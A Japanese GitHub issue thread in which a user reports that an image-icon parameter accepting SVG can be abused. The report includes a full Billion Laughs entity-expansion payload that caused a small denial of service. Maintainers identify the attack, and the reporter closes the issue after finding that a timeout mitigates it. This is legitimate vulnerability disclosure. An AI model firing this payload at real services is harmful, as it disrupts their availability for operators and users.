### ISSUE TITLE
XXEの脆弱性

### ISSUE THREAD

**Issue by pr0xy-t** [SnO2WMaN/tohohoify#9]
iconパラメータにsvgファイルを指定することでXXEによる攻撃を行うことができます
例えば以下のようなsvgファイルを指定することで小規模なdosを行えることを確認しました
`<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY a0 "aaaaaaaaaaaaaaaaaaaaaaa" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"><!ENTITY a4 "&a3;&a3;&a3;&a3;"> ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="10" x="0" y="70" fill="red">&a4;</text></svg>`

**Comment by pr0xy-t** [comment]
twitterのDMできなかったのでここに書かせていただきました。すみません

**Comment by SnO2WMaN** [comment]
これ原理，対策に関して全て解らないんですが，何か解決法や出典ありませんか

**Comment by tosuke** [comment]
Billion laughs attackとして知られているもののようです

参考: https://ja.wikipedia.org/wiki/Billion_laughs%E6%94%BB%E6%92%83

**Comment by pr0xy-t** [comment]
xmlの外部参照を行うコードの実行を確認できていないので、XXE(XML外部実体攻撃)(https://ja.wikipedia.org/wiki/XML%E5%A4%96%E9%83%A8%E5%AE%9F%E4%BD%93%E6%94%BB%E6%92%83)
ではないかもしれないです

Billion laughs attack の対策についてですが、大きめの文字列を指定してBillion laughs attack を行ってみたところ
`This Serverless Function has timed out.`
となりタイムアウトになりました。
フレームワークでタイムアウトの設定が既になされていて、
これはBillion laughs attackの対策になってるなと思いました

**Comment by pr0xy-t** [comment]
これはぼくの勘違い・調査不足で脆弱性ではない可能性が高いので一旦Closeさせていただきます。

ただ、svgファイルを読み込めるのはすこし怖いなと思いました
